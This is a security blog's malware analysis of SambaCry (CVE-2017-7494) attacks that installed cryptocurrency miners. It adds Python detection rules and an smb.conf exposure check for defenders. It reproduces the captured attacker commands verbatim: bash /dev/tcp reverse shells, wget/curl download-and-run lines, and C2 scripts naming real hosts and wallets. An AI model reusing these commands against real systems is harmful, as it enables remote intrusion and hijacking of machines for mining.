
360 core security technology blog

Posted by trammel at 2020-02-29

Author: redrain & houjingyi159 @ 360 Network Security Response Center

Samba released version 4.6.4 on May 24, 2017, fixing a serious remote code execution vulnerability, CVE-2017-7494. The vulnerability affects all Samba versions from 3.5.0 up to 4.6.4/4.5.10/4.4.14. 360 Network Security Response Center and the Gear team of the 360 Information Security Department analyzed the vulnerability as soon as it was disclosed and confirmed that it is serious and can lead to remote code execution. Earlier analysis: Http://blogs.360.cn/blog/samba Remote Code Execution Vulnerability cve-2017-7494 analysis/

SambaCry is a wormable vulnerability capable of large-scale propagation. Recently, Kaspersky Lab's honeypots captured an attack that exploits SambaCry to turn compromised hosts into bots for cryptocurrency mining. Here, 360 Network Security Response Center and the 360 Sun Chasing team present a technical analysis of the backdoor used in that incident.

Vulnerability exploitation

Because exploitation requires write access to an SMB share, the attack traffic captured by Kaspersky Lab's honeypot shows the attacker first writing a file with a random name to the server and deleting it once the write succeeds.

Once write access is confirmed, the attacker brute-forces the full path of the written file to learn the local directory path of the share, then writes the malicious shared library there as the payload.

Having found the correct path, the attacker uses CVE-2017-7494 to make Samba load the malicious library and execute its command. Because Samba runs as root by default, the command executed by the loaded library also runs as root. After successful exploitation the written library is deleted, and the malicious commands continue to run only in memory.
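As an added defensive check (not part of the original analysis): the exploit needs a share the attacker can write to, and the workaround given in the Samba advisory for CVE-2017-7494 is `nt pipe support = no` in `[global]`. The Python below parses an smb.conf and reports both; the sample config is constructed, and the precedence handling is simplified as noted in the comments.

```python
import re

# Constructed sample smb.conf (not from the page): one writable share,
# one read-only share, and no CVE-2017-7494 workaround in [global].
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
[public]
   path = /srv/samba/public
   guest ok = yes
   read only = no
[docs]
   path = /srv/samba/docs
   writable = no
"""
YES, NO = ("yes", "true", "1"), ("no", "false", "0")

def parse_smb_conf(text):
    """Minimal smb.conf parser -> {section: {key: value}}, all lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":  # blank or comment line
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip().lower()
    return sections

def writable_shares(sections):
    """Shares with 'writable'/'writeable' = yes or 'read only' = no (Samba's default
    is read only = yes; if both keys appear Samba lets the later one win, which
    this simplified check does not model: it flags the share if either says so)."""
    found = []
    for name, opts in sections.items():
        if name == "global":
            continue
        w = opts.get("writable", opts.get("writeable"))
        if w in YES or opts.get("read only") in NO:
            found.append(name)
    return found

def pipe_support_disabled(sections):
    """True if [global] has 'nt pipe support = no', the advisory's workaround."""
    return sections.get("global", {}).get("nt pipe support") in NO
```

A share listed by `writable_shares` on a pre-4.6.4/4.5.10/4.4.14 server without the workaround is exactly the precondition the attack above relies on.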

Malicious library samples: 349d84b3b176bbc9834230351ef3bc2a_16106.so (INAebsGB.so) and 2009af3fed2a4704c224694dfc4b31dc_30361.so (cblRWuoCc.so)

Sample analysis

INAebsGB.so simply spawns a reverse shell through /bin/sh, which is then used to download files or run follow-up commands.

This library turns out to have been generated by Metasploit's is_known_pipename module.

Later another library, cblRWuoCc.so, was written. This one connects back to port 4000 on the C2 server and downloads a mining program, turning the bot into a CPU miner. From this sample we located the C2 server and the mining program.

The command it executes:

bash -i < /dev/tcp/rc.ezreal.space/4000 || ((wget http://rc.ezreal.space/minerd64_s -O /tmp/m || curl http://rc.ezreal.space/minerd64_s -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))

The attacker downloads http://rc.ezreal.space/minerd64_s to /tmp/m, marks it executable and runs it.

A quick lookup of the C2 server gives:

rc.ezreal.space  A record  149.255.35.33

Date        IP             Country  Province/State   ISP
2017-05-17  149.255.35.33  USA      Illinois         swiftway.net
2017-05-15  149.255.35.33  USA      Illinois         swiftway.net
2017-04-30  185.86.150.76  Sweden   Västra Götaland

Other hosts under the same domain:
www.ezreal.space  191.101.31.100
cl.ezreal.space   191.101.31.100
rc2.ezreal.space  149.255.35.77
rc.ezreal.space   149.255.35.33

A typo-prone hacker?

Connecting to port 4000 on rc.ezreal.space returns the following script:

#!/usr/bin/env bash
host='149.255.35.33';
nohup bash -i < /dev/tcp/${host}/4001 &
nohuo bash -i < /dev/tcp/${host}/4002 &
nohuo bash -i < /dev/tcp/${host}/4003 &

The attacker meant to use nohup so the shells would ignore SIGHUP and keep running in the background, but, whether through carelessness or not we cannot say, typed nohuo instead of nohup on the last two lines.

Connecting to the other three ports yields these scripts:

➜ /tmp nc 149.255.35.33 4001
#!/usr/bin/env bash
host='149.255.35.33';
target=$RANDOM;
target+=.so;
target=/tmp/$target;
cat < /dev/tcp/${host}/5000 > $target && chmod +x $target && nohup $target &

➜ /tmp nc 149.255.35.33 4002
#!/usr/bin/env bash

➜ /tmp nc 149.255.35.33 4003
#!/usr/bin/env bash

The miner program served on port 5000 of the C2 is identical to the one obtained via the HTTP download.

Miner analysis

As of this writing the C2 server is still alive. We downloaded minerd64_s and took a quick look: it is the common CPU mining program minerd. Unlike the usual setup, the attacker passes no command-line parameters; instead, all parameters are hardcoded into the binary.

The attacker's mining pool and wallet address are quickly found in the binary's strings:

.rodata:0000000000515604 00000026 C stratum+tcp:
.rodata:00000000005156CC 00000060 C 43xtViRHn1oibjS6yZSgS6XhFFkSRGC5SHgmymH6ei4r5osjPrC1z85BeCZS89ZtL4iDGDoUhEoKtcVe115Wp7sB6XzHmgy

Querying the mining pool's transactions shows that the attacker is mining the altcoins XDN and XMR. Looking at the recent payouts, the income is not bad :)

Another attack

We expected our analysis to end up much the same as Kaspersky's, but the 360 Sun Chasing team also provided another sample, 1bb17e0d03ebd5acafbe60b70e38dec4.so (oooo.so).

This library is very similar to cblRWuoCc.so, but its behaviour differs.

It simply connects back to a port on the C2 server, which returns the following shell script:

#!/usr/bin/env bash
pkill .so;
host='45.76.146.166';
target=$RANDOM;
target+=.so;
target=/tmp/$target;
cat < /dev/tcp/${host}/5555 > $target && chmod +x $target && nohup $target &
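As an added example (not from the original post), the following Python applies detection rules to shell command lines, e.g. from auditd execve records or a bash history, for the patterns shared by the scripts served on ports 4000, 4001 and 5555 above: the bash /dev/tcp reverse shell, the cat-from-/dev/tcp dropper, download-to-/tmp-then-chmod, nohup of a /tmp payload, and the pkill .so cleanup. The sample command lines are constructed from the scripts on this page; everything else is an assumption of the example.

```python
import re

# Detection rules distilled from the scripts recovered in this incident;
# each (name, regex) pair is applied to one shell command line.
RULES = [
    # bash -i reading stdin from /dev/tcp/<host>/<port>: bash-builtin reverse shell
    ("reverse_shell_devtcp", re.compile(r"bash\s+-i\s*<\s*/dev/tcp/[^/\s]+/\d+")),
    # cat < /dev/tcp/... > file: raw TCP download that needs neither wget nor curl
    ("devtcp_download", re.compile(r"cat\s*<\s*/dev/tcp/[^/\s]+/\d+\s*>\s*\S+")),
    # wget/curl into /tmp followed by chmod +x: drop-and-execute
    ("tmp_drop_and_exec", re.compile(r"(wget|curl)\s.*?-[Oo]\s*/tmp/\S+.*chmod\s+\+x\s+/tmp/")),
    # nohup of a /tmp path or of the $target variable the scripts build under /tmp
    ("nohup_tmp", re.compile(r"nohup\s+(/tmp/\S+|\$target)")),
    # pkill .so: the oooo.so script kills earlier payloads before dropping a new one
    ("pkill_so", re.compile(r"pkill\s+\.so")),
]

def classify(cmd):
    """Names of every rule matching this command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmd)]

def scan(lines):
    """{line: [rule names]} for every line that hits at least one rule."""
    hits = {}
    for line in lines:
        names = classify(line)
        if names:
            hits[line] = names
    return hits

# Constructed sample command lines: the first three mirror the incident's scripts
# (the attacker's 'nohuo' typo is kept on purpose), the last two are benign.
SAMPLE_CMDS = [
    "bash -i < /dev/tcp/rc.ezreal.space/4000 || ((wget http://rc.ezreal.space/minerd64_s -O /tmp/m || curl http://rc.ezreal.space/minerd64_s -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))",
    "nohuo bash -i < /dev/tcp/${host}/4002 &",
    "pkill .so; cat < /dev/tcp/${host}/5555 > $target && chmod +x $target && nohup $target &",
    "wget https://example.com/report.pdf -O /home/user/report.pdf",
    "nohup /usr/bin/backup.sh &",
]

if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDS).items():
        print(names, "<-", line[:60])
```

Note that the mistyped nohuo line slips past the nohup rule, which is why the /dev/tcp rules, keyed on the part of the command the attacker cannot misspell without breaking it, carry the detection.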

Fetching from 45.76.146.166:5555 yields another miner binary. It differs from the first only in its wallet address:

.rodata:0000000000515604 00000024 C stratum+tcp:
.rodata:00000000005156CC 00000060 C 4AxoWMDfiPkh1PDHeyDi2TRpHC8hxHKY6ACtWRSY9Um4PuwPqjn9vAhdsSshmGu1RbZBUgKX42f584jGENHwXxsVGENHoGV

Summary

From the moment SambaCry was disclosed we expected attackers to abuse it for profit. Since the WannaCry incident built on EternalBlue, attacks have become routine: whenever a general-purpose and extremely easy-to-use vulnerability is exposed, attacks follow. As the value of Bitcoin rises, so does that of other cryptocurrencies, which gives attackers a channel to cash out from network attacks.

Timeline

May 24, 2017: Samba released version 4.6.4, fixing the remote code execution vulnerability CVE-2017-7494.
May 25, 2017: 360 Network Security Response Center and 360 Information Security Department jointly issued an early-warning notice and the first vulnerability analysis.
May 30, 2017: Kaspersky Lab's honeypot captured the first in-the-wild malicious exploitation of SambaCry.
June 12, 2017: 360 Network Security Response Center and the 360 Sun Chasing team jointly carried out a technical analysis of the attack method.

Reference source

https://securelist.com/sambacry-is-coming/78674/

Posted by cyg07 on June 13, 2017 at 02:41:28 in the Virus Analysis category; last revised August 14, 2018 at 14:47:41.